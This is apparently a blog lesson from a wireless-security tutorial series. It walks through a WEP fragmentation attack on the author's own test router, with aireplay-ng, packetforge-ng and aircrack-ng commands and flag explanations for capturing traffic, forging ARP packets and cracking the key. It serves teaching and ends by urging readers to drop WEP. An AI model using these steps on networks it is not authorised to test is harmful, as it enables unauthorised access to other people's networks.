15 – WEP Fragmentation attack

Similar to the Chopchop attack carried out in the previous lesson the fragmentation attack greatly speeds up the cracking process by injecting arbitrary packets into the wireless access point and by generating them with packetforge-ng after obtaining the xor file from the fragmentation attack.

There is a great write up by Andrea Bittau which explains this attack in a lot more detail than I am going to here and you should give it a read as it is very informative.

Once again like Chopchop the pseudo random sequence produced by the RC4 which is referred to as the PRGA is required to successfully carry out this attack. Aireplay-ng will automatically extract the 8 byte keystream and use it to inject our arbitrary forged packets into the access point network.

This is also a great attack to run if there are no clients currently connected to the access point 🙂

Let’s get to it and have a closer look so first configure your router as follows1 - Configure routerPut your card into monitor mode2 - configure monitor modeStart airodump-ng

airodump-ng mon0 -c 6 –bssid 2C:B0:5D:XX:XX:XX -w frag

“airodump-ng” to start airodump-ng
“mon0” is to set the interface of your wireless card
“-c” is to set your channel which is currently set to 1
“–bssid” is to set the MAC address of the access point
“-w” is to write this to a capture file called frag3 - airodump-ng startNext run aireplay-ng to do a fake authentication with the access point using your actual physical card MAC address

aireplay-ng -1 0 -e test -a 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0

“aireplay-ng” to start aireplay-ng
“-1” is for a fake authentication
“0” is for re-association timing in seconds and may need to be adjusted
“-a” is followed by the MAC addres of the access point
“-h” is the physical MAC address of your card
“mon0” is the interface of the wireless card4.1 - fake authentication with the access pointOutput of airodump-ng currently looks like the following with no data packets being sent or received on the network currently and out wireless card is associated using a fake authentication as seen above4 - airodump-ng outputRun the fragment attack

aireplay-ng -5 -e test -b 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0

“aireplay-ng” to start aireplay-ng
“-5” specifies that you want to run the fragmentation attack
“-e” is to specify the SSID of the access point which is test
“-b” is to set the MAC address of the access point
“-h” is your physical wireless card MAC address
“mon0” is the interface of your wireless card5 - fragment attack startSuccessful output from the fragmentation attack looks like the following below, as you can see we have obtained the keystream and it is saved in the xor file which we can now use to create an arbitrary packet using packetforge-ng6 - fragment attack processedNow you can use packetforge-ng to craft a packet of your choosing which is an arp packet in this case like in he Chopchop attack

packetforge-ng -0 -a 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX -k -l -y replay_dec.xor -w arp-request

“packetforge-ng” to start packetforge-ng
“-0” is to forge an arp packet
“-a” is for specifying the access point MAC address
“-h” is to specify your wireless card MAC address
“-k” is for setting the destination IP and or port in this case a broadcast
“-l” which is a lower case ‘L’ to save confusion is for setting the source and or port which is once again a broadcast
“-y” is to use the xor file obtained from the fragmentation attack to forge the packet
“-w” is to write the forged packet to a file which is called arp-request7 - create arp request with packetforge-ngOnce you have your packet forged from the previous step you can then inject it into the access point issuing the following aireplay-ng parameters

“aireplay-ng” will start aireplay-ng
“-2” is to run an interactive packet replay
“-r” is to select the file in which to extract packets from in which is arp-request here
“mon0” is the interface of your card to run this from8 - Inject arp-request forgedWait a few minutes to generate enough packets before running aircrack-ng as I noticed on the Raspberry Pi 2 anyway this seems to freeze the injection process and thus means restarting the process over again, wait for a few minutes and you should see the data has risen greatly, the more data packets seen here the better for the cracking process9 - airodump-ng outputStart aircrack-ng against the airodump-ng capture using the following

“aircrack-ng” starts aircrack-ng
“frag-01.cap” is the name of the capture file in which to run aircrack-ng against

As you can see we have obtained a huge amount of IV’s  so this should be quick and easy10 - aircrack-ng startingAircrack-ng success looks like the following11 - aircrack-ng successLesson learned:

I really find I am repeating myself now when it comes to WEP encryption and you can probably already hear me saying it, don’t use WEP! If you know somebody using it help them out and teach them how to secure their network . Much like the Chopchop attack carried out in the previous lesson this allows you to greatly increase the speed in which you can obtain and crack the WEP key by increasing the volume of data packets on the network by injecting our arbitrary arp packets forged with packetforge-ng into the access point in order to obtain more IV’s and speed up the cracking process.


One thought on “15 – WEP Fragmentation attack

Leave a Reply